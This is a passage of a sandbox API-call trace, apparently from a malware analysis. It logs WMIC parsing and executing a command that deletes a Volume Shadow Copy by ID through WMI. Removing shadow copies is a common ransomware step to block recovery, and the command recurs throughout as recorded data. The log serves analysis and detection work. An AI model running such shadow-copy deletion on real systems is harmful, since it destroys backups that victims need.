wSecond=0x18, wMilliseconds=0x190)) [0120.102] _vsnwprintf (in: _Buffer=0x416e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16f8c8 | out: _Buffer="09-04-2020T08:55:24") returned 19 [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] malloc (_Size=0x90) returned 0x4170a0 [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] malloc (_Size=0x90) returned 0x41ce20 [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] malloc (_Size=0x16) returned 0x41cae0 [0120.102] lstrlenW (lpString="shadowcopy") returned 10 [0120.102] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0120.102] malloc (_Size=0x16) returned 0x41cb00 [0120.102] malloc (_Size=0x8) returned 0x417140 [0120.102] free (_Block=0x0) [0120.102] free (_Block=0x41cae0) [0120.102] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.102] malloc (_Size=0xc) returned 0x41cae0 [0120.102] lstrlenW (lpString="where") returned 5 [0120.102] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0120.103] malloc (_Size=0xc) returned 0x41cb20 [0120.103] malloc (_Size=0x10) returned 0x41cb40 [0120.103] memmove_s (in: _Destination=0x41cb40, _DestinationSize=0x8, _Source=0x417140, _SourceSize=0x8 | out: _Destination=0x41cb40) returned 0x0 [0120.103] free (_Block=0x417140) [0120.103] free (_Block=0x0) [0120.103] free (_Block=0x41cae0) [0120.103] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.103] malloc (_Size=0x5c) returned 0x41cec0 [0120.103] lstrlenW (lpString="\"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\"") returned 45 [0120.103] _wcsicmp (_String1="\"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\"", _String2="\"NULL\"") returned -5 [0120.103] lstrlenW (lpString="\"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\"") returned 45 [0120.103] lstrlenW (lpString="\"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\"") returned 45 [0120.103] malloc (_Size=0x5c) returned 0x41cf30 [0120.103] malloc (_Size=0x18) returned 0x41cae0 [0120.103] memmove_s (in: _Destination=0x41cae0, _DestinationSize=0x10, _Source=0x41cb40, _SourceSize=0x10 | out: _Destination=0x41cae0) returned 0x0 [0120.103] free (_Block=0x41cb40) [0120.103] free (_Block=0x0) [0120.103] free (_Block=0x41cec0) [0120.103] lstrlenW (lpString=" shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete") returned 71 [0120.103] malloc (_Size=0xe) returned 0x41cb40 [0120.103] lstrlenW (lpString="delete") returned 6 [0120.103] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0120.103] malloc (_Size=0xe) returned 0x41cb60 [0120.103] malloc (_Size=0x20) returned 0x41cec0 [0120.103] memmove_s (in: _Destination=0x41cec0, _DestinationSize=0x18, _Source=0x41cae0, _SourceSize=0x18 | out: _Destination=0x41cec0) returned 0x0 [0120.103] free (_Block=0x41cae0) [0120.103] free (_Block=0x0) [0120.103] free (_Block=0x41cb40) [0120.104] malloc (_Size=0x20) returned 0x41cef0 [0120.104] lstrlenW (lpString="QUIT") returned 4 [0120.104] lstrlenW (lpString="shadowcopy") returned 10 [0120.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0120.104] lstrlenW (lpString="EXIT") returned 4 [0120.104] lstrlenW (lpString="shadowcopy") returned 10 [0120.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0120.104] free (_Block=0x41cef0) [0120.104] WbemLocator:IUnknown:AddRef (This=0x1e21390) returned 0x2 [0120.104] malloc (_Size=0x20) returned 0x41cef0 [0120.104] lstrlenW (lpString="/") returned 1 [0120.104] lstrlenW (lpString="shadowcopy") returned 10 [0120.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0120.104] lstrlenW (lpString="-") returned 1 [0120.104] lstrlenW (lpString="shadowcopy") returned 10 [0120.104] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0120.104] lstrlenW (lpString="CLASS") returned 5 [0120.105] lstrlenW (lpString="shadowcopy") returned 10 [0120.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0120.105] lstrlenW (lpString="PATH") returned 4 [0120.105] lstrlenW (lpString="shadowcopy") returned 10 [0120.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0120.105] lstrlenW (lpString="CONTEXT") returned 7 [0120.105] lstrlenW (lpString="shadowcopy") returned 10 [0120.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0120.105] lstrlenW (lpString="shadowcopy") returned 10 [0120.105] malloc (_Size=0x16) returned 0x41cb40 [0120.105] lstrlenW (lpString="shadowcopy") returned 10 [0120.105] GetCurrentThreadId () returned 0xb74 [0120.105] ??0CHString@@QEAA@XZ () returned 0x16f780 [0120.105] malloc (_Size=0x18) returned 0x41cae0 [0120.105] malloc (_Size=0x18) returned 0x41cb80 [0120.105] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e21390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff922998 | out: ppNamespace=0xff922998*=0x1e33a98) returned 0x0 [0120.125] free (_Block=0x41cb80) [0120.125] free (_Block=0x41cae0) [0120.125] CoSetProxyBlanket (pProxy=0x1e33a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.125] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.125] GetCurrentThreadId () returned 0xb74 [0120.125] ??0CHString@@QEAA@XZ () returned 0x16f618 [0120.125] malloc (_Size=0x18) returned 0x41cae0 [0120.125] malloc (_Size=0x18) returned 0x41cb80 [0120.125] malloc (_Size=0x18) returned 0x41cba0 [0120.125] malloc (_Size=0x18) returned 0x41cbc0 [0120.125] SysStringLen (param_1="root\\cli") returned 0x8 [0120.125] SysStringLen (param_1="\\") returned 0x1 [0120.125] malloc (_Size=0x18) returned 0x41cbe0 [0120.125] SysStringLen (param_1="root\\cli\\") returned 0x9 [0120.126] SysStringLen (param_1="ms_409") returned 0x6 [0120.126] free (_Block=0x41cbc0) [0120.126] free (_Block=0x41cba0) [0120.126] free (_Block=0x41cb80) [0120.126] free (_Block=0x41cae0) [0120.126] malloc (_Size=0x18) returned 0x41cae0 [0120.126] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e21390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9229a0 | out: ppNamespace=0xff9229a0*=0x1e33b28) returned 0x0 [0120.129] free (_Block=0x41cae0) [0120.129] free (_Block=0x41cbe0) [0120.129] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.129] GetCurrentThreadId () returned 0xb74 [0120.129] ??0CHString@@QEAA@XZ () returned 0x16f790 [0120.129] malloc (_Size=0x18) returned 0x41cbe0 [0120.129] malloc (_Size=0x18) returned 0x41cae0 [0120.129] malloc (_Size=0x18) returned 0x41cb80 [0120.129] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0120.129] malloc (_Size=0x3a) returned 0x41cfa0 [0120.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff8b1980, cbMultiByte=-1, lpWideCharStr=0x41cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0120.129] free (_Block=0x41cfa0) [0120.129] malloc (_Size=0x18) returned 0x41cba0 [0120.129] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0120.129] SysStringLen (param_1="shadowcopy") returned 0xa [0120.129] malloc (_Size=0x18) returned 0x41cbc0 [0120.129] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0120.129] SysStringLen (param_1="'") returned 0x1 [0120.130] free (_Block=0x41cba0) [0120.130] free (_Block=0x41cb80) [0120.130] free (_Block=0x41cae0) [0120.130] free (_Block=0x41cbe0) [0120.130] IWbemServices:GetObject (in: This=0x1e33a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x16f798*=0x0, ppCallResult=0x0 | out: ppObject=0x16f798*=0x1e404e0, ppCallResult=0x0) returned 0x0 [0120.136] malloc (_Size=0x18) returned 0x41cbe0 [0120.136] IWbemClassObject:Get (in: This=0x1e404e0, wszName="Target", lFlags=0, pVal=0x16f6c0*(varType=0x0, wReserved1=0xff92, wReserved2=0x0, wReserved3=0x0, varVal1=0xff922998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6c0*(varType=0x8, wReserved1=0xff92, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.136] free (_Block=0x41cbe0) [0120.136] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.136] malloc (_Size=0x3e) returned 0x41cfa0 [0120.136] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.136] malloc (_Size=0x18) returned 0x41cbe0 [0120.136] IWbemClassObject:Get (in: This=0x1e404e0, wszName="PWhere", lFlags=0, pVal=0x16f6c0*(varType=0x0, wReserved1=0xff92, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ae298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6c0*(varType=0x8, wReserved1=0xff92, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.136] free (_Block=0x41cbe0) [0120.137] lstrlenW (lpString=" Where ID = '#'") returned 15 [0120.137] malloc (_Size=0x20) returned 0x41cff0 [0120.137] lstrlenW (lpString=" Where ID = '#'") returned 15 [0120.137] malloc (_Size=0x18) returned 0x41cbe0 [0120.137] IWbemClassObject:Get (in: This=0x1e404e0, wszName="Connection", lFlags=0, pVal=0x16f6c0*(varType=0x0, wReserved1=0xff92, wReserved2=0x0, wReserved3=0x0, varVal1=0x1fbd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6c0*(varType=0xd, wReserved1=0xff92, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e409c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.137] free (_Block=0x41cbe0) [0120.137] IUnknown:QueryInterface (in: This=0x1e409c0, riid=0xff8b7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f6b0 | out: ppvObject=0x16f6b0*=0x1e409c0) returned 0x0 [0120.137] GetCurrentThreadId () returned 0xb74 [0120.137] ??0CHString@@QEAA@XZ () returned 0x16f5d8 [0120.137] malloc (_Size=0x18) returned 0x41cbe0 [0120.137] IWbemClassObject:Get (in: This=0x1e409c0, wszName="Namespace", lFlags=0, pVal=0x16f600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff8c738f, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x41cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.137] free (_Block=0x41cbe0) [0120.137] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0120.137] malloc (_Size=0x16) returned 0x41cbe0 [0120.137] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0120.137] malloc (_Size=0x18) returned 0x41cae0 [0120.138] IWbemClassObject:Get (in: This=0x1e409c0, wszName="Locale", lFlags=0, pVal=0x16f600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x41cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.138] free (_Block=0x41cae0) [0120.138] lstrlenW (lpString="ms_409") returned 6 [0120.138] malloc (_Size=0xe) returned 0x41cae0 [0120.138] lstrlenW (lpString="ms_409") returned 6 [0120.138] malloc (_Size=0x18) returned 0x41cb80 [0120.138] IWbemClassObject:Get (in: This=0x1e409c0, wszName="User", lFlags=0, pVal=0x16f600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.138] free (_Block=0x41cb80) [0120.138] malloc (_Size=0x18) returned 0x41cb80 [0120.138] IWbemClassObject:Get (in: This=0x1e409c0, wszName="Password", lFlags=0, pVal=0x16f600*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.138] free (_Block=0x41cb80) [0120.138] malloc (_Size=0x18) returned 0x41cb80 [0120.138] IWbemClassObject:Get (in: This=0x1e409c0, wszName="Server", lFlags=0, pVal=0x16f600*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x41cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.138] free (_Block=0x41cb80) [0120.138] lstrlenW (lpString=".") returned 1 [0120.139] malloc (_Size=0x4) returned 0x417140 [0120.139] lstrlenW (lpString=".") returned 1 [0120.139] malloc (_Size=0x18) returned 0x41cb80 [0120.139] IWbemClassObject:Get (in: This=0x1e409c0, wszName="Authority", lFlags=0, pVal=0x16f600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0x41cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.139] free (_Block=0x41cb80) [0120.139] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.139] IUnknown:Release (This=0x1e409c0) returned 0x1 [0120.139] GetCurrentThreadId () returned 0xb74 [0120.139] ??0CHString@@QEAA@XZ () returned 0x16f5d8 [0120.139] malloc (_Size=0x18) returned 0x41cb80 [0120.139] IWbemClassObject:Get (in: This=0x1e404e0, wszName="__RELPATH", lFlags=0, pVal=0x16f600*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x22a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0120.139] free (_Block=0x41cb80) [0120.139] malloc (_Size=0x18) returned 0x41cb80 [0120.139] GetCurrentThreadId () returned 0xb74 [0120.139] ??0CHString@@QEAA@XZ () returned 0x16f458 [0120.140] ??0CHString@@QEAA@PEBG@Z () returned 0x16f470 [0120.140] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f400 [0120.140] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0120.140] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x41d020 [0120.140] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0120.140] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f3c0 [0120.140] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f408 [0120.140] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f470 [0120.140] ??1CHString@@QEAA@XZ () returned 0x30370901 [0120.140] ??1CHString@@QEAA@XZ () returned 0x30370901 [0120.140] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f3c8 [0120.140] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f400 [0120.140] ??1CHString@@QEAA@XZ () returned 0x1 [0120.140] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x41d090 [0120.140] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0120.140] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f3c0 [0120.140] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f408 [0120.140] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f470 [0120.140] ??1CHString@@QEAA@XZ () returned 0x30370901 [0120.140] ??1CHString@@QEAA@XZ () returned 0x30370901 [0120.140] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f3c8 [0120.140] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f400 [0120.140] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.140] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0120.140] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.140] malloc (_Size=0x18) returned 0x41cba0 [0120.141] malloc (_Size=0x18) returned 0x41cc00 [0120.141] malloc (_Size=0x18) returned 0x41cc20 [0120.141] malloc (_Size=0x18) returned 0x41cc40 [0120.141] malloc (_Size=0x18) returned 0x41cc60 [0120.141] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0120.141] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0120.141] malloc (_Size=0x18) returned 0x41cc80 [0120.141] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0120.141] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0120.141] malloc (_Size=0x18) returned 0x41cca0 [0120.141] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0120.141] SysStringLen (param_1="\"") returned 0x1 [0120.141] free (_Block=0x41cc80) [0120.141] free (_Block=0x41cc60) [0120.141] free (_Block=0x41cc40) [0120.142] free (_Block=0x41cc20) [0120.142] free (_Block=0x41cc00) [0120.142] free (_Block=0x41cba0) [0120.142] IWbemServices:GetObject (in: This=0x1e33b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f448*=0x0, ppCallResult=0x0 | out: ppObject=0x16f448*=0x1e40a50, ppCallResult=0x0) returned 0x0 [0120.143] malloc (_Size=0x18) returned 0x41cba0 [0120.143] IWbemClassObject:Get (in: This=0x1e40a50, wszName="Text", lFlags=0, pVal=0x16f480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff922ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f480*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x224aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1ae030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0120.143] free (_Block=0x41cba0) [0120.143] SafeArrayGetLBound (in: psa=0x224aa0, nDim=0x1, plLbound=0x16f460 | out: plLbound=0x16f460) returned 0x0 [0120.143] SafeArrayGetUBound (in: psa=0x224aa0, nDim=0x1, plUbound=0x16f450 | out: plUbound=0x16f450) returned 0x0 [0120.143] SafeArrayGetElement (in: psa=0x224aa0, rgIndices=0x16f444, pv=0x16f498 | out: pv=0x16f498) returned 0x0 [0120.143] malloc (_Size=0x18) returned 0x41cba0 [0120.143] malloc (_Size=0x18) returned 0x41cc00 [0120.143] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0120.143] free (_Block=0x41cba0) [0120.143] IUnknown:Release (This=0x1e40a50) returned 0x0 [0120.143] free (_Block=0x41cca0) [0120.144] ??1CHString@@QEAA@XZ () returned 0x30370901 [0120.144] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.144] free (_Block=0x41cb80) [0120.144] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.144] lstrlenW (lpString="Shadow copy management.") returned 23 [0120.144] malloc (_Size=0x30) returned 0x4185c0 [0120.144] lstrlenW (lpString="Shadow copy management.") returned 23 [0120.144] free (_Block=0x41cc00) [0120.144] IUnknown:Release (This=0x1e404e0) returned 0x0 [0120.144] free (_Block=0x41cbc0) [0120.144] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0120.144] lstrlenW (lpString="PATH") returned 4 [0120.144] lstrlenW (lpString="where") returned 5 [0120.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0120.144] lstrlenW (lpString="WHERE") returned 5 [0120.144] lstrlenW (lpString="where") returned 5 [0120.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0120.144] lstrlenW (lpString="/") returned 1 [0120.144] lstrlenW (lpString="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 43 [0120.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0120.144] lstrlenW (lpString="-") returned 1 [0120.144] lstrlenW (lpString="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 43 [0120.144] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0120.145] lstrlenW (lpString="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 43 [0120.145] malloc (_Size=0x58) returned 0x41d020 [0120.145] lstrlenW (lpString="ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 43 [0120.145] lstrlenW (lpString="/") returned 1 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0120.145] lstrlenW (lpString="-") returned 1 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] malloc (_Size=0xe) returned 0x41cbc0 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] lstrlenW (lpString="GET") returned 3 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0120.145] lstrlenW (lpString="LIST") returned 4 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0120.145] lstrlenW (lpString="SET") returned 3 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0120.145] lstrlenW (lpString="CREATE") returned 6 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0120.145] lstrlenW (lpString="CALL") returned 4 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0120.145] lstrlenW (lpString="ASSOC") returned 5 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0120.145] lstrlenW (lpString="DELETE") returned 6 [0120.145] lstrlenW (lpString="delete") returned 6 [0120.145] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0120.146] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.146] malloc (_Size=0x3e) returned 0x41d080 [0120.146] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0120.146] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0120.146] malloc (_Size=0x18) returned 0x41cc00 [0120.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0120.146] lstrlenW (lpString="FROM") returned 4 [0120.146] lstrlenW (lpString="*") returned 1 [0120.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0120.146] malloc (_Size=0x18) returned 0x41cb80 [0120.146] free (_Block=0x41cc00) [0120.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0120.146] lstrlenW (lpString="FROM") returned 4 [0120.146] lstrlenW (lpString="from") returned 4 [0120.146] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0120.146] malloc (_Size=0x18) returned 0x41cc00 [0120.146] free (_Block=0x41cb80) [0120.146] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0120.146] malloc (_Size=0x18) returned 0x41cb80 [0120.146] free (_Block=0x41cc00) [0120.146] free (_Block=0x41d080) [0120.146] free (_Block=0x41cb80) [0120.146] lstrlenW (lpString="SET") returned 3 [0120.146] lstrlenW (lpString="delete") returned 6 [0120.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0120.147] lstrlenW (lpString="CREATE") returned 6 [0120.147] lstrlenW (lpString="delete") returned 6 [0120.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0120.147] free (_Block=0x41cef0) [0120.147] malloc (_Size=0x8) returned 0x416f20 [0120.147] lstrlenW (lpString="GET") returned 3 [0120.147] lstrlenW (lpString="delete") returned 6 [0120.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0120.147] lstrlenW (lpString="LIST") returned 4 [0120.147] lstrlenW (lpString="delete") returned 6 [0120.147] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", 